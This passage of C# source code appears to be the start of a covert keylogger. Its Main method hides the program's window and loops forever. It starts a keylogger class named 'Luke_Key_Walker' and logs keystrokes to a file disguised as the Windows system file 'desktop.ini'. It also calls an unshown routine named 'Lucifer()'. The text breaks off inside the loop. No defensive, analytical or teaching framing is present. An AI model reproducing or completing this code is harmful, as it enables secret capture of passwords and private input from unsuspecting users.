class MainApp     {         [DllImport("user32.dll")]         static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);                 static TimeSpan dueTime = new TimeSpan(0, 5, 0);         static TimeSpan period = new TimeSpan(0, 5, 0);         static  Project122.Luke_Key_Walker kl = new Project122.Luke_Key_Walker();         [STAThread]                   static void Main(string[] args)         {             IntPtr h = Process.GetCurrentProcess().MainWindowHandle;           ShowWindow(h, 0);               while (true)             {                   try                 {                                         Assembly asmPath = System.Reflection.Assembly.GetExecutingAssembly();                     string exePath = asmPath.Location.Substring(0, asmPath.Location.LastIndexOf("\\"));                       Lucifer();                                                   int fInterval = 1000;                     string filename = "desktop.ini";                     string mode = "day";                     string output = "file";                           kl.LOG_OUT = output;                       kl.LOG_MODE = mode;                       string pestilence = System.IO.Path.GetTempPath();                       string logpath = exePath + "\\" + filename;                             kl.LOG_FILE = logpath;                             kl.Enabled = true;                     kl.FlushInterval = fInterval;